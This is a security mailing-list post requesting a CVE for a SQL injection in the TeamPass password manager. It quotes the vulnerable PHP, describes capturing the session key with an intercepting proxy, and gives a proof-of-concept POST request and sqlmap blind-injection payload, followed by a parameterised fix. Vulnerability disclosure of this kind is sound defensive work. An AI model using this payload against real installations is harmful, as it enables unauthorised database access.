Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 14 Apr 2016 12:08:26 +0800
From: das das <scusec2010@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request:SQL injection in TeamPass

Hello again,
I sent you an email two days ago,which was misformatted.Now I resend
it from a gmail account.Hope this time it displays normally.
I'd like to request a CVE-ID for the vulnerability found in
TeamPass-2.1.24 and TeamPass-2.1.25. TeamPass is a Passwords Manager
dedicated for managing passwords in a collaborative way on any server
Apache, MySQL and PHP.
Here is the issue,
========================================
SQL injection vectors in sources/users.queries.php
========================================
-------------------------code_start TeamPass-2.1.24-------------------------
if (!checkUser($_SESSION['user_id'], $_SESSION['key'], "manage_users")) {
    $_SESSION['error']['code'] = ERR_NOT_ALLOWED; //not allowed page
    include $_SESSION['settings']['cpassman_dir'].'/error.php';
    exit();
}
........
/**
* UPDATE MANAGER RIGHTS FOR USER
*/
case "gestionnaire":
  // Check KEY
  if ($_POST['key'] != $_SESSION['key']) {
   // error
    exit();
    }
  DB::update(
    prefix_table("users"),
    array(
       'gestionnaire' => $_POST['value']
      ),
      "id = ".$_POST['id']
      );
  break;
-------------------------code_end TeamPass-2.1.24--------------------------
-------------------------code_start TeamPass-2.1.25-------------------------
if (!checkUser($_SESSION['user_id'], $_SESSION['key'], "manage_users")) {
    $_SESSION['error']['code'] = ERR_NOT_ALLOWED; //not allowed page
    include $_SESSION['settings']['cpassman_dir'].'/error.php';
    exit();
}
........
/**
* UPDATE MANAGER RIGHTS FOR USER
*/
 case "gestionnaire":
     // Check KEY
     if ($_POST['key'] != $_SESSION['key']) {
         // error
         exit();
     }

     DB::update(
         prefix_table("users"),
         array(
             'gestionnaire' => $_POST['value'],
             'admin' => $_POST['value'] == 1 ? "0" : "1",
             'read_only' => $_POST['value'] == 1 ? "0" : "1"
            ),
         "id = ".$_POST['id']
     );
     echo prepareExchangedData(array("error" => ""), "encode");
     break;
-------------------------code_end TeamPass-2.1.25--------------------------

When the post parameter 'type' = 'gestionnaire', the function 'update
manager rights for user' will be excuted. it checks the user's role in
the beginning, and needs the authority of manage_user to access to
this page
The SQL injection happens in  ---code_start--- "id = ".$_POST['id']
---code_end---, the post parameter 'id' is not properly handled.
To execute the SQL query,it verifies that if the the post parameter
'key' equals session['key'].We can get the key through this
way´╝Ürefresh the page(e.g index.php?page=manage_main), capture the
packet using tools (e.g Burp Suit), and forward the packet,then we can
get the value of session 'key' in the request body.
e.p
http://localhost/teampass/sources/users.queries.php
POST:
type=gestionnaire&key=AfVvIafUhSpWwzTnRM9LWEFxrX3gLmK4xoQ4dDDrsPM8.TpnCr&value=0&id=1'
Sqlmap payload:
sqlmap identified the following injection point(s) with a total of 43
HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: type=gestionnaire&key=8ILEoZI08Lkquj5gonpx425wD46ANdkTiIIAJmGVHJhM6S9BaJ&&value=1&id=(SELECT
(CASE WHEN (6429=6429) THEN 6429 ELSE 6429*(SELECT 6429 FROM
INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE
[RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS)
END))
---
To fix it,
 ---code_start---
DB::update(
         prefix_table("users"),
         array(
             'gestionnaire' => $_POST['value'],
             'admin' => $_POST['value'] == 1 ? "0" : "1",
             'read_only' => $_POST['value'] == 1 ? "0" : "1"
            ),
         "id = %i",
         $_POST['id']
     );
 ---code_end---

This issue was discovered by Mereme[D.A.S] of Information Security
Institute @ Sichuan University.
Thank you for your time and guidance!

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ